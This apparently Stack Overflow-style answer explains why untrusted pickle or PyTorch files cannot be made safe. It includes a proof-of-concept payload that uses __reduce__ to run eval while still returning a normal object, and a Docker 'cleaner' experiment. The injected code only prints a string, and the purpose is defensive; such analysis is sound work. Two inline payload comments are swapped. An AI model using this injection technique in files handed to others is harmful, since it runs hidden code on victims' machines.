As pointed out by @MobeusZoom
, this is answer is about Pickle and not PyTorch format. Anyway as PyTorch load mechanism relies on Pickle behind the scene observations drawn in this answer still apply.
TL;DR;
Don't try to sanitize pickle. Trust or reject.
Quoted from Marco Slaviero in his presentation Sour Pickle at the Black Hat USA 2011.
Real solution is:
- Don't setup exchange with unequally trusted parties;
- Setup a secure transport layer for exchange;
- Sign exchanged files;
Also be aware that there are new kind of AI based attacks, this even if the pickle is shellcode free, you still may have other issues to address when loading pre-trained networks from untrusted sources.
Important notes
From the presentation linked above we can draw several important notes:
- Pickle use a Virtual Machine to reconstruct live data (PVM happens alongside the python process), this virtual machine is not Turing complete but has: an instruction set (opcodes), a stack for the execution and a memo to host object data. This is enough for attacker to create exploits.
- Pickle mechanism is backward compatible, it means latest Python can unpickle the very first version of its protocol.
- Pickle can (re)construct any object as long as PVM does not crash, there is no consistency check in this mechanism to enforce object integrity.
- In broad outline, Pickle allows attacker to execute shellcode in any language (including python) and those code can even persist after the victim program exits.
- Attacker will generally forge their own pickles because it offers more flexibility than naively using pickle mechanism. Off course they can use pickle as an helper to write opcode sequences. Attacker can craft the malicious pickle payload in two significant ways:
- to prepend the shellcode to be executed first and leave the PVM stack clean. Then you probably get a normal object after unpickling;
- to insert the shellcode into the payload, so it gets executed while unpickling and may interact with the memo. Then unpickled object may have extra capabilities.
- Attackers are aware of "safe unpickler" and know how to circumvent them.
MCVE
Find below a very naive MCVE to evaluate your suggestion to encapsulate cleaning of suspect pickled files in Docker container. We will use it to assess main associated risks. Be aware, real exploit will be more advanced and complexer.
Consider the two classes below, Normal
is what you expect to unpickle:
# normal.py
class Normal:
def __init__(self, config):
self.__dict__.update(config)
def __str__(self):
return "<Normal %s>" % self.__dict__
And Exploit
is the attacker vessel for its shellcode:
# exploit.py
class Exploit(object):
def __reduce__(self):
return (eval, ("print('P@wn%d!')",))
Then, the attacker can use pickle as an helper to produce intermediate payloads in order to forge the final exploit payload:
import pickle
from normal import Normal
from exploit import Exploit
host = Normal({"hello": "world"})
evil = Exploit()
host_payload = pickle.dumps(host, protocol=0) # b'c__builtin__\neval\np0\n(S"print(\'P@wn%d!\')"\np1\ntp2\nRp3\n.'
evil_payload = pickle.dumps(evil, protocol=0) # b'(i__main__\nNormal\np0\n(dp1\nS"hello"\np2\nS"world"\np3\nsb.'
At this point the attacker can craft a specific payload to both inject its shellcode and returns the data.
with open("inject.pickle", "wb") as handler:
handler.write(b'c__builtin__\neval\np0\n(S"print(\'P@wn%d!\')"\np1\ntp2\nRp3\n(i__main__\nNormal\np0\n(dp1\nS"hello"\np2\nS"world"\np3\nsb.')
Now, when victim will deserialize the malicious pickle file, the exploit is executed and a valid object is returned as expected:
from normal import Normal
with open("inject.pickle", "rb") as handler:
data = pickle.load(handler)
print(data)
Execution returns:
P@wn%d!
<Normal {'hello': 'world'}>
Off course, shellcode is not intended to be so obvious, you may not notice it has been executed.
Containerized cleaner
Now, lets try to clean this pickle as you suggested. We will encapsulate the following cleaning code:
# cleaner.py
import pickle
from normal import Normal
with open("inject.pickle", "rb") as handler:
data = pickle.load(handler)
print(data)
cleaned = Normal(data.__dict__)
with open("cleaned.pickle", "wb") as handler:
pickle.dump(cleaned, handler)
with open("cleaned.pickle", "rb") as handler:
recovered = pickle.load(handler)
print(recovered)
Into a Docker image to try to contain its execution. As a baseline, we could do something like this:
FROM python:3.9
ADD ./exploit ./
RUN chown 1001:1001 inject.pickle
USER 1001:1001
CMD ["python3", "./cleaner.py"]
Then we build the image and execute it:
docker build -t jlandercy/doclean:1.0 .
docker run -v /home/jlandercy/exploit:/exploit jlandercy/doclean:1.0
Also ensure the mounted folder containing the exploit has restrictive ad hoc permissions.
P@wn%d!
<Normal {'hello': 'world'}> # <-- Shellcode has been executed
<Normal {'hello': 'world'}> # <-- Shellcode has been removed
Now the cleaned.pickle
is shellcode free. Off course you need to carefully check this assumption before releasing the cleaned pickle.
Observations
As you can see, Docker image does not prevent the exploit to be executed when unpickling but it may help to contain the exploit in some extent.
Points of attention are (not exhaustive):
- Having a recent pickle file with the original protocol is a hint but not an evidence of something suspicious.
- Be aware even if containerized, you still are running attacker code on your host;
- Additionally, attacker may have designed its exploit to break a Docker container, use unprivileged user to reduce the risk;
- Don't bind any network to this container as attacker can start a terminal and expose it over a network interface (and potentially to the web);
- Depending on how the attacker has designed its exploit data may not be available at all. For the instance, if
__reduce__
method actually returns the exploit instead of a recipe to recreate the desired instance. After all the main purpose of this is to make you unpickling it nothing more;
- If you intend to dump raw data after loading the suspicious pickle archive you need a strict procedure to detach data from the exploit;
- The cleaning step can be a limitation. It relies on your ability to recreate the intended object from the malicious payload. It will depends on what is really reconstructed from the pickle file and how the desired object constructor needs to be parametrized;
- Finally, if you are confident in your cleaning procedure, you can mount a volume to access the result after the container exits.